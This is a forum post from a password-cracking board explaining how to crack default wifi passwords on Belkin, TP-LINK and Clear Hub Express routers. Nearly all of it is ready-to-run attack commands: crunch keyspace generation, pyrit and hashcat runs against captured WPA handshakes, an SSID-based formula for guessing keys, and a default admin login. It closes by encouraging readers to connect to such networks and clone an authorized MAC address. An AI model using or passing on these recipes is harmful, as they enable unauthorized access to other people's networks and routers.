Here are default passwords for Belkin.xxx, TP-LINK-xxx and WiFiRSU_xx

Discussion in 'Dictionary, Password & Wordlists' started by wawawa3, 6 Sep 2016.

  1. wawawa3

    wawawa3 Active Member

    Joined:
    7 Apr 2015
    Messages:
    35
    Likes Received:
    12
    I think this is interesting: When pixie dust fails to find your password for Belkin, try Crippled-Master:
    https://github.com/Konsole512/Crippled
    and if that fails you can usually get the password by crunching hexidecimal (lower case only) thus:
    crunch 8 8 0123456789abcdef -t @@@@@@@@ -o /root/belkin.lst
    Then to test your handshake against that crunched list:
    pyrit -r Belkin.a1b.cap -i /root/belkin.lst attack_passthrough
    or with hashcat:
    cudahashcat32 -m 2500 -a 3 -1 0123456789abcdef Belkin.a1b.hccap ?1?1?1?1?1?1?1?1
    (change "Belkin.a1b.hccap" to the actual hccap name, of course)

    NEXT: The last few TP-LINK routers I've purchased all use an 8 digit number for both the wifi password AND the wps pin number, so if you can capture a handshake just crunch passthrough for 8 digits. In hashcat that looks like:
    cudahashcat32 -m 2500 -a 3 TP-LINK-abc.hccap ?d?d?d?d?d?d?d?d

    NEXT: When you see an SSID like WiFiRSU_xx it's a Clear Hub Express wifi modem/router. The default wifi password will be all the characters which follow the underslash, with enough digits added to the start to make it 8 characters long. So if you see:
    WiFiRSU_ab1cd
    Then the password will be 3 digits added thus: @@@ab1cd
    So:
    crunch 8 8 0123456789 -t @@@ab1cd -o /root/WiFiRSU.lst
    then
    pyrit -r WiFiRSU_ab1cd .cap -i /root/WiFiRSU.lst attack_passthrough
    ANOTHER EXAMPLE:
    For WiFiRSU_aa the password will be six digits added thus: @@@@@@aa
    So:
    crunch 8 8 0123456789 -t @@@@@@aa -o /root/WiFiRSU.lst
    then
    pyrit -r WiFiRSU_aa.cap -i /root/WiFiRSU.lst attack_passthrough
    INFO: The Clear Hub Express Default Router login is:
    192.168.15.1 and user/pass:
    NONE CLEAR123
    I have not tried to connect to one of these so let me know how you make out. (You might have to clone an authorized MAC?)
     

Share This Page

Loading...